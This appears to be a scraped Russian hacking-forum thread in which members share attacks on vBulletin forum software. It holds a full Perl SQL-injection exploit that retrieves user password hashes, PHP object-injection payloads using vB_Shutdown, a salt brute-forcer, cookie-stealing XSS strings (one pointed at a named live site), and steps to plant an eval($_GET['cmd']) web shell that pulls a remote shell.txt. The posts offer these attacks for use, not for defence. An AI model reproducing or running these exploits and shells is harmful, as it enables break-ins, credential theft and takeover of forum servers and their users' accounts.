Форумы [Обзор уязвимостей vBulletin]

Discussion in 'Уязвимости CMS/форумов' started by bandera, 19 Aug 2006.

  1. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    823
    Reputations:
    1,418
    Root-access для удачной эксплуатации "плоент" надо немного изменить
     
  2. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    Да я уже понял, что там ошибка, только пока её не исправил.
    Структура данных там такая:
    vB_Shutdown Object ( [shutdown] => Array ( [0] => phpinfo ) )

    Надо её исправить...
     
    #62 Root-access, 30 Dec 2009
    Last edited: 30 Dec 2009
  3. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    budden, попробую вписать eval($_GET[cmd]), дальше site.ru/forum/faq.php?cmd=phpinfo(); или сразу весь код шелла запихнуть, дальше site.ru/forum/faq.php смотри что вышло

    P.S не в ту тему написал
     
    #63 .:[melkiy]:., 31 Dec 2009
    Last edited: 1 Jan 2010
    1 person likes this.
  4. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    254
    Likes Received:
    110
    Reputations:
    7
    Раскрытие путей

    vBulletin® Version 3.8.4

    Code:
    localhost/vb/calendar.php?do[]=[]add&[]type=[]recur&c=[]%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
    Code:
    Warning: trim() expects parameter 1 to be string, array given in C:\xampp\htdocs\vb\includes\class_core.php on line 1651
    Уязвимый код:

    PHP:
     function xss_clean($var)
        {
            static
                
    $preg_find    = array('#^javascript#i''#^vbscript#i'),
                
    $preg_replace = array('java script',   'vb script');

            return 
    preg_replace($preg_find$preg_replacehtmlspecialchars(trim($var)));
        }
    UPD

    Code:
    http://localhost/vb/forumdisplay.php?do[]
    Code:
    Unable to add cookies, header already sent.
    File: C:\xampp\htdocs\vb\includes\class_core.php
    Line: 3277
    Code:
    Warning: trim() expects parameter 1 to be string, array given in C:\xampp\htdocs\vb\includes\class_core.php on line 1651
    Уязвимый код:

    PHP:
    foreach (array('_GET''_POST') AS $arrayname)
            {
                if (isset(
    $GLOBALS["$arrayname"]['do']))
                {
                    
    $GLOBALS["$arrayname"]['do'] = trim($GLOBALS["$arrayname"]['do']);
                }

                
    $this->convert_shortvars($GLOBALS["$arrayname"]);
            }
    Все GET и POST данные с параметром будет обрабатываться функцией trim,а если сделать их массивом,возникает ошибка.

    (C)Xcontrol212
     
    #64 Xcontrol212, 5 Jan 2010
    Last edited: 5 Jan 2010
    3 people like this.
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Vbulletin 4.0.1 Remote SQL Injection

    п.с. хз пашет или нет...

    Code:
    #!/usr/bin/perl 
     
    use IO::Socket; 
     
     
    print q{ 
    #######################################################################
    #    vBulletin™ Version 4.0.1 Remote SQL Injection Exploit            #
    #                      By indoushka                                   #
    #                     www.iq-ty.com/vb                                #
    #               Souk Naamane  (00213771818860)                        #
    #           Algeria Hackerz ([email protected])                   # 
    #          Dork: Powered by vBulletin™ Version 4.0.1                  #            
    ####################################################################### 
    }; 
     
    if (!$ARGV[2]) { 
     
    print q{ 
    	Usage: perl  VB4.0.1.pl host /directory/ victim_userid 
     
           perl  VB4.0.1.pl www.vb.com /forum/ 1 
     
     
    }; 
     
    } 
     
     
    $server = $ARGV[0]; 
    $dir    = $ARGV[1]; 
    $user   = $ARGV[2]; 
    $myuser = $ARGV[3]; 
    $mypass = $ARGV[4]; 
    $myid   = $ARGV[5]; 
     
    print "------------------------------------------------------------------------------------------------\r\n"; 
    print "[>] SERVER: $server\r\n"; 
    print "[>]    DIR: $dir\r\n"; 
    print "[>] USERID: $user\r\n"; 
    print "------------------------------------------------------------------------------------------------\r\n\r\n"; 
     
    $server =~ s/(http:\/\/)//eg; 
     
    $path  = $dir; 
    $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; 
     
     
    print "[~] PREPARE TO CONNECT...\r\n"; 
     
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; 
     
    print "[+] CONNECTED\r\n"; 
    print "[~] SENDING QUERY...\r\n"; 
    print $socket "GET $path HTTP/1.1\r\n"; 
    print $socket "Host: $server\r\n"; 
    print $socket "Accept: */*\r\n"; 
    print $socket "Connection: close\r\n\r\n"; 
    print "[+] DONE!\r\n\r\n"; 
     
     
     
    print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; 
    while ($answer = <$socket>) 
    { 
     
     if ($answer =~/(\w{32})/) 
    { 
     
      if ($1 ne 0) { 
       print "Password is: ".$1."\r\n"; 
    print "--------------------------------------------------------------------------------------\r\n"; 
     
          } 
    exit(); 
    } 
     
    } 
    print "------------------------------------------------------------------------------------------------\r\n";
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    регулярка для хоста неправильная, но по всей видимости это спецпорог, т.к. очевидно, что специальная ошибка
     
  7. Soul Linker

    Soul Linker New Member

    Joined:
    5 Sep 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    Потомучто там
    Code:
    $temp = unserialize($check);
    if ($temp['do'] == 'doenterpwd')
    {
    	$vbulletin->GPC['postvars'] = '';
    }
    
    Соответственно переделываем сериализованную часть:
    echo serialize(array('do'=>'do', 'obj' => new vB_Shutdown));
    Code:
    a:2:{s:2:"do";s:2:"do";s:3:"obj";O:11:"vB_Shutdown":1:{s:8:"shutdown";a:1:{i:0;s:7:"phpinfo";}}}
    
    но как с толком использовать вызов функции без параметров? :(

    ps У нуленых by DGT 'COOKIE_SALT' не пустой. :(
    pss, но вполне брутабельный.
    Брутится исходя из куки "bbforum_view". Например
    f544eb9368b8ac964d27534650bff240510eb278a-1-{i-3_i-1267278281_}
    Первые 40 символов это хэш соленого сериал. массива:
    Code:
    $c = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_'; // 36 chars
    //							20
    $inp = intval(@$argv[1]);
    
    $salt = 'VBF';
    
    for ($a1 = $inp; $a1 <= 35; $a1++)
    {
    	$salt[3] = $c[$a1];
    	for ($a2 = 0; $a2 <= 35; $a2++)
    	{
    		$salt[4] = $c[$a2];
    		for ($a3 = 0; $a3 <= 35; $a3++)
    		{
    			$salt[5] = $c[$a3];
    			for ($a4 = 0; $a4 <= 35; $a4++)
    			{
    				$salt[6] = $c[$a4];
    				echo $salt."\n";
    				for ($a5 = 0; $a5 <= 35; $a5++)
    				{
    					$salt[7] = $c[$a5];
    					for ($a6 = 0; $a6 <= 35; $a6++)
    					{
    						$salt[8] = $c[$a6];
    						for ($a7 = 0; $a7 <= 35; $a7++)
    						{
    							$salt[9] = $c[$a7];
    							if (sha1('a-1-{i-3_i-1267278281_}' . sha1($salt) ) === 'f544eb9368b8ac964d27534650bff240510eb278')
    								die('Found: '.$salt);
    						}
    					}
    				}
    			}
    		}
    	}
    }
    
    для большинства форумов 3.8.2 ~ 3.8.4 подходит:

    Может сказать что не существует такого форума, тогда надо будет подшаманить ?f=26

    http://site.com/forumdisplay.php?f=26&do=doenterpwd&newforumpwd=&postvars=efeba30e34b02bd0fcdb07795c42eaedad5bf111a:2:{s:2:%22do%22;s:2:%22do%22;s:3:%22obj%22;O:11:%22vB_Shutdown%22:1:{s:8:%22shutdown%22;a:3:{i:0;s:7:%22phpinfo%22;i:1;s:21:%22debug_print_backtrace%22;i:2;s:3:%22die%22;}}}

    Никто так и не придумал как эту багу использовать то? :/
     
    #67 Soul Linker, 24 Feb 2010
    Last edited: 1 Jun 2010
    1 person likes this.
  8. iGlass

    iGlass New Member

    Joined:
    14 May 2009
    Messages:
    86
    Likes Received:
    1
    Reputations:
    0
    Нашол минут 5 назад.

    Незнаю боян не боян, но у себя на форуме версии 3.8.2 когда заходишь в профиль можно написать "Публичное сообщение"

    Такой код проходит свободно.
    ><script>alert(/byby/)</script>
     
    #68 iGlass, 6 Mar 2010
    Last edited: 14 Mar 2010
  9. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    vBulletin® версия 3.7.0 Gold

    http://forum/serverChecker/?IP=**.**.***.***&port=29901"><script>alert(document.cookie)</script>

    (c)Feldmarschall
     
    _________________________
    1 person likes this.
  10. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Vbulletin 4.0.2 XSS Vulnerability

    Code:
    =================================
    Vbulletin 4.0.2 XSS Vulnerability
    =================================
    
    [+] Vbulletin 4.0.2 XSS Vulnerability
    
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : Inj3ct0r.com                                  0
    1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
    0                                                                      0
    1                    ######################################            1
    0                    I'm 5ubzer0  member from Inj3ct0r Team            1
    1                    ######################################            0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    
    [+] Discovered By: 5ubzer0
    [+] My id : http://inj3ct0r.com/author/2307
    [+] Original : http://inj3ct0r.com/exploits/9697
    # Version: Vbulletin 4.0.2
    
    www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
    www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>
    
    Exemple:
    http://www.forumjogosonline.com.br/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

    # ~ - [ [ : Inj3ct0r : ] ]
    # Inj3ct0r.com [2010-03-19]
     
    1 person likes this.
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Как вы задолбали =\
    Не надо ставить копирайты на этого inj3ct0r'а - это копипастер\плагиатор.

    Посмотрите у китайцев, эта бага лежит с 9 числа, и если этот клоун поставил туда своё авторство, это не значит, что он автор
    http://sebug.net/vulndb/19240/
     
    3 people like this.
  12. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    461
    Reputations:
    452
    Банальная XSS.
    vBulletin® Version 3.8.2

    Code:
    http://site.ru/forum/modcp/index.php?loc=javascript:document.write('<script>alert(document.cookie);</script>');

    PS.
    В теме не нашел, в гугле тоже не заметил, что кто то выкладывал. :rolleyes:
     
    _________________________
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Пассивка в админке.
    3.8.2
     
    1 person likes this.
  14. 4upakabr0

    4upakabr0 Member

    Joined:
    14 May 2008
    Messages:
    124
    Likes Received:
    23
    Reputations:
    0
    SQL Конфиг в 3.8.6

    site.com/forum/faq.php?s=&do=search&q=database&match=all&titlesonly=0
     
  15. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Действует только в 3.8.6, или также на более ранних (в частности, на 3.8.4)?
     
  16. 4upakabr0

    4upakabr0 Member

    Joined:
    14 May 2008
    Messages:
    124
    Likes Received:
    23
    Reputations:
    0
    only 3.8.6 because debug bug ^)
    https://forum.antichat.ru/thread219320.html
     
  17. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Продукт: ставим vBulletin
    Месторасположение: Vbulletin: Справка - faq_complete
    Вставляем в тело код нашего шелла eval($_GET['cmd']);
    Сохраняем, идём в faq (справка), если он был такой eval($_GET['cmd']); делаем так site.сom/forumpath/faq.php?cmd=тут команда
    site.сom/forumpath/faq.php?cmd=include($_GET[aa]);&aa=http://site.com/shell.txt
    Требуется allow_url_include = on
     
    _________________________
    #77 Дирижабль, 29 Aug 2010
    Last edited: 29 Aug 2010
  18. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ===============================================================
    vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
    ===============================================================



     
    #78 547, 23 Sep 2010
    Last edited: 24 Sep 2010
    1 person likes this.
  19. himmi

    himmi New Member

    Joined:
    29 Jun 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    хм...

    можно получить. только если баг не пофиксен самим админом... действует для 3.8.4 и 3.8.5 (нужно регить админа под логином admin... не помню точно. полистай странички этой темы тут есть. только текст на инглише написан... выглядит как эксплоит...=) красота... ;) а если быть точнее, то подними глаза на верх страницы. =) это он и есть... ADMIN&#00
     
    #79 himmi, 28 Sep 2010
    Last edited: 28 Sep 2010
  20. delasoul

    delasoul Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    я что то не врубилься где добавит &#?
     
Loading...